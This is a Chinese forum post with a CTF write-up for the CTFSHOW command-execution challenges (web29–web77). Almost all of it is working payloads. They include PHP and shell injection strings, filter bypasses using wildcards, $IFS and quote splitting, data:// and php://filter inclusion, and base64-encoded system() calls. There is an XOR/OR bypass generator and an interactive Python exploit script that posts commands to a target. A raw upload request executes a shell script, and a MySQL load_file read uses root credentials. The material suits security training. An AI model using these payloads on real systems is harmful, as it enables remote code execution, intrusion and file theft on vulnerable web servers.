首页
论坛
课程
招聘
[原创]CTFSHOW命令执行WP
2021-9-22 17:26 19329

[原创]CTFSHOW命令执行WP

2021-9-22 17:26
19329

CTFSHOW命令执行

web29

过滤了flag

 

payload:

 

随便写几个姿势

1
2
3
4
5
6
7
8
/?c=system("nl fl??????");
/?c=system("nl fl*");
/?c=system("nl fla''g.php");
/?c=echo `nl fla""g.php`;
/?c=echo `nl fla\g.php`;
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=eval($_GET[1]);&1=system('nl flag.php');
剩下的我不会了

web30

过滤了flag|system|php

 

用echo 反引号来执行命令

 

payload:

1
2
3
4
5
/?c=echo `nl fla""g.p""hp`;
/?c=echo `nl fla?????`;
/?c=echo `nl f*`;
/?c=eval($_GET[1]);&1=system('nl flag.php');
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php

web31

过滤了flag|system|php|cat|sort|shell|\.| |

 

没关系,我们有都是姿势

 

payload:

1
2
3
/?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

web32

include不用括号,分号可以用?>代替。

 

payload:

1
2
3
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

web33-36

payload:

1
2
3
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

web37

1
2
3
4
5
6
7
8
9
10
11
12
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;   
    }
}else{
    highlight_file(__FILE__);
}

payload:

1
2
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php system("nl fla*");?>

web38

过滤了flag

 

payload:

1
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

web39

payload:

1
/?c=data://text/palin,<?php%20system("nl%20f*");?>

web40-41

理论上是异或

 

然后我懒

 

贴exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
import re
content = ''
preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/'
for i in range(256):
    for j in range(256):
        if not (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)):
            k = i | j
            if k>=32 and k<=126:
                a = '%' + hex(i)[2:].zfill(2)
                b = '%' + hex(j)[2:].zfill(2)
                content += (chr(k) + ' '+ a + ' ' + b + '\n')
f = open('rce_or.txt', 'w')
f.write(content)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os
os.system("php rce_or.php"#没有将php写入环境变量需手动运行
if(len(argv)!=2):
    print("="*50)
    print('USER:python exp.py <url>')
    print("eg:  python exp.py http://ctf.show/")
    print("="*50)
    exit(0)
url=argv[1]
def action(arg):
    s1=""
    s2=""
    for i in arg:
        f=open("rce_or.txt","r")
        while True:
            t=f.readline()
            if t=="":
                break
            if t[0]==i:
                #print(i)
                s1+=t[2:5]
                s2+=t[6:9]
                break
        f.close()
    output="(\""+s1+"\"|\""+s2+"\")"
    return(output)
 
while True:
    param=action(input("\n[+] your function:") )+action(input("[+] your command:"))
    data={
        'c':urllib.parse.unquote(param)
        }
    r=requests.post(url,data=data)
    print("\n[*] result:\n"+r.text)

exp取自https://wp.ctf.show/d/137-ctfshow-web-web41/4

web42

/dev/null 2>&1,让所有的输出流(包括错误的和正确的)都定向到空设备丢弃

 

%0a%26||截断

 

payload:

1
2
3
/?c=nl%20*%0a
= =姿势就不写那么多了
截断后看过滤自由发挥

web43

过滤了;|cat

 

payload:

1
/?c=nl%20*%0a

web44

多过滤了个flag

 

通配符搞定

 

payload:

1
/?c=nl%20*%0a

web45

空格被过滤了

 

payload:

1
/?c=nl$IFS*%0a

web46-49

过滤了\;|cat|flag| |[0-9]|\\$|\*/

 

payload:

1
2
3
4
5
6
7
8
9
/?c=nl%09fla\g.php||
/?c=nl%09fla\g.php%0a
/?c=nl%09fla''g.php%0a
/?c=nl%09fla""g.php%0a
/?c=vi%09fla\g.php%0a
/?c=tac%09fla\g.php%0a
/?c=uniq%09fla\g.php%0a
/?c=nl<fla''g.php||
/?c=nl%09fla\g.php%26

web50-51

payload:

1
/?c=nl<fla%27%27g.php||

web52

payload:

1
/?c=nl${IFS}/fl""ag%0a

web53

payload:

1
2
3
4
/?c=nl${IFS}fla%''g.p''hp
/?c=ca''t${IFS}fl??????
/?c=ca''t${IFS}fl''ag.p''hp
应该还有其他姿势

web54

payload:

1
2
3
/?c=mv${IFS}fla?.php${IFS}t.tx''t
爷给他改个名
/?c=/bin/?at${IFS}f???????

web55

= = 只能是数字

 

对不起骚套路开始

 

payload:

1
/?c=/???/????64+????.???

web56

https://blog.csdn.net/qq_46091464/article/details/108513145

 

数据包:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
POST /?c=.+/???/????????[@-[] HTTP/1.1
Host: 6595d4e2-edc5-4ff4-a08b-c93d2f563732.challenge.ctf.show:8080
Content-Length: 329
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydZeuVbMPZVcyvpNM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
 
------WebKitFormBoundarydZeuVbMPZVcyvpNM
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/octet-stream
 
#!/bin/sh
cat /var/www/html/flag.php
------WebKitFormBoundarydZeuVbMPZVcyvpNM
Content-Disposition: form-data; name="submit"
 
111
------WebKitFormBoundarydZeuVbMPZVcyvpNM--

web58

凑36

 

-37取反=36

 

payload:

1
$((~$(($((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))))))

web59

绕过disable_functions

 

我只想到一种

 

file可以把文件读取到一个数组,再打印出来

 

payload:

1
2
3
c=var_dump(file('flag.php'));
c=highlight_file("flag.php");
c=show_source('flag.php');

web60-65

payload:

1
2
c=highlight_file("flag.php");
c=show_source('flag.php');

web66

payload:

1
2
3
4
c=var_dump(scandir("/"));
扫描到flag 是txt
然后日他妈的
c=highlight_file('/flag.txt');

web67-70

= = 好家伙

 

ban的真多

 

payload:

1
2
3
c=include('/flag.txt');
c=require('/flag.txt');
c=require_once('/flag.txt');

web71

ob_get_contents — 返回输出缓冲区的内容 ob_end_clean — 清空(擦除)缓冲区并关闭输出缓冲

 

此函数丢弃最顶层输出缓冲区的内容并关闭这个缓冲区。如果想要进一步处理缓冲区的内容,必须在ob_end_clean()之前调用ob_get_contents(),因为当调用ob_end_clean()时缓冲区内容将被丢弃。

https://blog.csdn.net/solitudi/article/details/109837640?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163062881716780269897928%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=163062881716780269897928&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-109837640.first_rank_v2_pc_rank_v29&utm_term=y4tacker+%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C&spm=1018.2226.3001.4187 y4的blog说的很清楚

 

payload:

1
c=include('/flag.txt');;exit();

web72

看一下y4的blog就可以了= = payload不贴了 太长了。

 

##web73

1
2
3
4
5
6
c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>

看一下目录

 

然后

 

payload:

1
c=include('/flagc.txt');exit();

web74

同73题

web75-76

扫目录

1
c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);

mysql load_file读文件

1
2
3
4
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);

web77

不是很清楚这个题怎么做

 

但是我复现了一下

https://www.laruence.com/2020/03/11/5475.html

https://blog.csdn.net/miuzzx/article/details/108619930


[培训] 优秀毕业生寄语:恭喜id咸鱼炒白菜拿到远超3W月薪的offer,《安卓高级研修班》火热招生!!!

收藏
点赞2
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回